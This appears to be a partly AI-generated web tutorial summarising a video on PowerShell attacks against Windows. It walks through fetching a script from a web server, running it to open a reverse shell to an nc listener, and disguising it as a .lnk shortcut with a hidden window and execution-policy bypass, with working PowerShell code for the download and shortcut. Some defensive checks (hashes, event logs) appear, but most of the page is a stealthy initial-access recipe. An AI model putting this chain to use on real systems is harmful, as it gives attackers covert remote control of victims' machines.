PowerShell Hacking

Published on May 03, 2024
This response is partially generated with the help of AI. It may contain inaccuracies.

Step-by-Step Tutorial: PowerShell Hacking

Introduction:

In this tutorial, we walk through the PowerShell techniques demonstrated in the video "Great Power Comes Great Responsibility - PowerShell Hacking" by Loi Liang Yang. We will use PowerShell to create files, download a script from a web server, run it to open a reverse shell from a target Windows machine back to an attacker's listener, and wrap that in a shortcut file so the PowerShell window stays hidden.

Step 1: Launch PowerShell on Windows Machine

  1. Open the Start menu in the bottom left corner of the Windows desktop.
  2. Type "PowerShell" in the search bar and press Enter.
  3. This opens a Windows PowerShell console in which you can type commands and run scripts.

Step 2: Create a New File Using PowerShell

  1. In the PowerShell window, enter the following command to create a new file:
    New-Item -Path .\ -Name newfile.txt -ItemType File
    
  2. This command will create a new file named "newfile.txt" in the current directory.

Step 3: Download a File from a Web Server

  1. Use the Invoke-WebRequest cmdlet to download a file from a web server.
  2. For example, to download "d4.ps1" from the web server used in the video (192.168.0.192) and save it on your desktop as "default.ps1", use the following command ($env:USERPROFILE\Desktop is the current user's Desktop folder; a literal C:\Users\Desktop does not exist):
    Invoke-WebRequest -Uri http://192.168.0.192/d4.ps1 -OutFile $env:USERPROFILE\Desktop\default.ps1
    
  3. This command writes the response body to the specified location. Check what you fetched before you run it.
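Steps 2 and 3 together, as an added example that is not the video's script: it creates the file, downloads the script to the real Desktop path, and inspects the download before anything is executed. The URL is the page's placeholder, and the hash and execution-policy checks are my additions.

```powershell
# Added example: Step 2 and Step 3 as one script, plus pre-execution checks.
# The current user's Desktop; C:\Users\Desktop (as typed in some write-ups) does not exist.
$desktop = Join-Path $env:USERPROFILE 'Desktop'

# Step 2: create an empty file in the current directory
New-Item -Path . -Name newfile.txt -ItemType File -Force | Out-Null

# Step 3: download the script (placeholder URL from the page)
$url  = 'http://192.168.0.192/d4.ps1'
$dest = Join-Path $desktop 'default.ps1'
Invoke-WebRequest -Uri $url -OutFile $dest -UseBasicParsing

# In Windows PowerShell 5.1 'wget' and 'curl' are aliases for Invoke-WebRequest;
# PowerShell 6+ dropped them, so check before relying on the alias.
Get-Alias -Name wget -ErrorAction SilentlyContinue

# Look at what was fetched: size, hash and the first lines, before running it
Get-Item $dest | Select-Object FullName, Length, LastWriteTime
(Get-FileHash -Path $dest -Algorithm SHA256).Hash
Get-Content -Path $dest -TotalCount 5

# Script files are blocked by the default policy on Windows clients (Restricted).
Get-ExecutionPolicy -List
# Run with a per-process bypass instead of changing the machine-wide policy:
#   powershell.exe -ExecutionPolicy Bypass -File $dest
```

Compare the SHA256 against the hash of the file on your own web server; an HTTP download carries no integrity protection, so a mismatch means you are about to run something other than what you hosted.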

Step 4: Set Up a Reverse Shell

  1. Use the wget command (in Windows PowerShell 5.1 an alias for Invoke-WebRequest; the alias no longer exists in PowerShell 6+) to fetch a PowerShell script that provides a reverse shell.
  2. Copy the downloaded file to a directory of your choice on the target machine.
  3. Run the downloaded file with PowerShell (for example powershell.exe -ExecutionPolicy Bypass -File <script>) to establish the reverse shell connection.

Step 5: Execute the Reverse Shell

  1. Start a listener on the attacker machine (for example nc -lvnp 4444) before running the script.
  2. Pass the listener IP and port to the script; they must match the listener.
  3. Run the script on the target. The target connects out to the listener, and commands typed on the listener run on the target.

Step 6: Create a Shortcut File for PowerShell Execution

  1. Create a Windows shortcut (.lnk) file on the target.
  2. Set the shortcut's target to powershell.exe and put the script path and its parameters in the arguments, so the shortcut runs the reverse-shell script.
  3. Double-clicking the shortcut launches PowerShell with those arguments and establishes the connection.

Step 7: Hide the PowerShell Window

  1. Modify the shortcut so that the PowerShell console does not stay on screen when the commands run.
  2. Add -WindowStyle Hidden to the powershell.exe arguments; the console may still flash briefly while powershell.exe starts, but it is hidden for the rest of the session.
  3. Save the changes and double-click the shortcut.
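Steps 6 and 7 scripted, as an added example that is not from the video: it builds the .lnk with the WScript.Shell COM object instead of the Properties dialog, sets -WindowStyle Hidden, and reads the target back to confirm what a double-click will run. The script path, shortcut name, listener address and port are assumptions.

```powershell
# Added example: create a .lnk that runs the script with a hidden console (Steps 6 and 7).
$scriptPath   = Join-Path $env:USERPROFILE 'Desktop\default.ps1'   # assumed, from Step 3
$shortcutPath = Join-Path $env:USERPROFILE 'Desktop\Update.lnk'    # assumed name
$listenerIp   = '192.168.0.192'                                     # placeholder from the page
$listenerPort = 4444                                                # assumed port

$shell = New-Object -ComObject WScript.Shell
$lnk   = $shell.CreateShortcut($shortcutPath)

# Target is powershell.exe; everything the shortcut does lives in the arguments
$lnk.TargetPath = Join-Path $env:SystemRoot 'System32\WindowsPowerShell\v1.0\powershell.exe'
$lnk.Arguments  = "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden " +
                  "-File `"$scriptPath`" -ListenerIp $listenerIp -ListenerPort $listenerPort"
$lnk.WorkingDirectory = Split-Path -Path $scriptPath -Parent
# .lnk WindowStyle: 1 = normal, 3 = maximized, 7 = minimized. This only affects the
# initial console; the -WindowStyle Hidden argument is what hides it afterwards.
$lnk.WindowStyle  = 7
$lnk.IconLocation = (Join-Path $env:SystemRoot 'System32\shell32.dll') + ',1'
$lnk.Save()

# Read the shortcut back: this is exactly what a double-click executes
$check = $shell.CreateShortcut($shortcutPath)
'{0} {1}' -f $check.TargetPath, $check.Arguments
```

The readback is the same information a defender sees: a .lnk whose target is powershell.exe with -WindowStyle Hidden and -ExecutionPolicy Bypass in its arguments is a well-known initial-access artifact, so on a real engagement expect it to be flagged by endpoint tooling.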

Step 8: Verify the Reverse Shell Connection

  1. Start the listener again on the attacker machine (for example nc -lvnp 4444).
  2. Double-click the modified shortcut on the target to establish a hidden reverse shell connection.
  3. Verify the connection: the listener shows the incoming connection and a prompt, and commands typed there run on the target.
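The same verification from the target side, as an added example not shown in the video: it finds the outbound connection and the powershell.exe that owns it, and checks the PowerShell operational log for the script. Listener address and port are the page's placeholder and an assumed value.

```powershell
# Added example: confirm the hidden reverse shell from the target (Step 8).
$listenerIp   = '192.168.0.192'   # placeholder from the page
$listenerPort = 4444              # assumed

# An established outbound TCP connection to the listener, with its owning process
Get-NetTCPConnection -RemoteAddress $listenerIp -RemotePort $listenerPort -State Established -ErrorAction SilentlyContinue |
    ForEach-Object {
        $p = Get-Process -Id $_.OwningProcess
        [pscustomobject]@{
            Local   = '{0}:{1}' -f $_.LocalAddress, $_.LocalPort
            Remote  = '{0}:{1}' -f $_.RemoteAddress, $_.RemotePort
            Pid     = $p.Id
            Process = $p.ProcessName
        }
    }

# A powershell.exe started with -WindowStyle Hidden typically has no visible main window (handle 0)
Get-Process -Name powershell -ErrorAction SilentlyContinue |
    Select-Object Id, MainWindowHandle, StartTime

# If Script Block Logging is enabled, the script text is in Event ID 4104
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 50 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'TcpClient' } |
    Select-Object TimeCreated, @{ n = 'Snippet'; e = { $_.Message.Substring(0, [Math]::Min(120, $_.Message.Length)) } }
```

If the connection is missing, check in this order: the listener is up and reachable (Test-NetConnection -ComputerName $listenerIp -Port $listenerPort), the execution policy did not block the script (the bypass is in the shortcut arguments), and the shortcut's arguments still point at the right file.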

By following these steps, you can see how PowerShell alone is enough to download, run and hide a reverse shell on a Windows system. Use this knowledge only on systems you are authorized to test.